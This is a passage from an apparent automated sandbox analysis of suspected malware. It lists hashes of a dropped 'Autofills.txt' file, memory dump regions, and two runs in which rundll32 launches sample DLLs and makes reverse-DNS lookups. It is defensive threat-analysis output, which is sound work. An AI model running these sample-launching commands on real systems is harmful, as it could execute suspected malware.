| SHA512 | 63fd17a1fec1efb41fce70b6b9130de215c63e1ed58a3169139b21cd32f84804d5fbfde5b76a894d83f2c71f8bf594cd855f823dc16ce984f2f3aec228759f58 |
C:\Users\Admin\AppData\Local\Temp\Autofills.txt
| MD5 | 8fb196cd3b31b00bb8e35df5c490ade1 |
| SHA1 | cf7acf3dde5ba8f808be6025cf28dfe573120307 |
| SHA256 | 969fd23147e88067565018fc4141eed85cd208906a8b878b098defeb4156ebf8 |
| SHA512 | 1c101e51db23045dcaf2edf4e414099c3430951afb9625673197f1d21df7cded2c2bd43e02966571c6910d107a5a04b2461bc030e6babe9343090bf05ca63581 |
memory/3788-65-0x00007FF7020B0000-0x00007FF7021A8000-memory.dmp
memory/3788-66-0x00007FF95B8D0000-0x00007FF95B904000-memory.dmp
memory/3788-75-0x00007FF94B6A0000-0x00007FF94B8AB000-memory.dmp
memory/3788-76-0x00007FF95B700000-0x00007FF95B741000-memory.dmp
memory/3788-77-0x00007FF9478D0000-0x00007FF948980000-memory.dmp
memory/3788-84-0x000002509B900000-0x000002509BA13000-memory.dmp
memory/3788-83-0x00007FF947000000-0x00007FF947035000-memory.dmp
memory/3788-82-0x00007FF94BD20000-0x00007FF94BD31000-memory.dmp
memory/3788-81-0x00007FF94BD40000-0x00007FF94BD51000-memory.dmp
memory/3788-80-0x00007FF951DD0000-0x00007FF951DE1000-memory.dmp
memory/3788-79-0x00007FF951E00000-0x00007FF951E18000-memory.dmp
memory/3788-78-0x00007FF95B610000-0x00007FF95B631000-memory.dmp
memory/3788-73-0x00007FF95B8B0000-0x00007FF95B8CD000-memory.dmp
memory/3788-71-0x00007FF95B9E0000-0x00007FF95B9F7000-memory.dmp
memory/3788-74-0x00007FF95B860000-0x00007FF95B871000-memory.dmp
memory/3788-72-0x00007FF95B9A0000-0x00007FF95B9B1000-memory.dmp
memory/3788-70-0x00007FF95C310000-0x00007FF95C321000-memory.dmp
memory/3788-69-0x00007FF95F410000-0x00007FF95F427000-memory.dmp
memory/3788-67-0x00007FF94B8B0000-0x00007FF94BB66000-memory.dmp
memory/3788-68-0x00007FF95FE90000-0x00007FF95FEA8000-memory.dmp
memory/2592-87-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-86-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-85-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-91-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-93-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-97-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-96-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-95-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-94-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-92-0x00000246B6270000-0x00000246B6271000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240426-en
Max time kernel
147s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
146s
Max time network
156s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |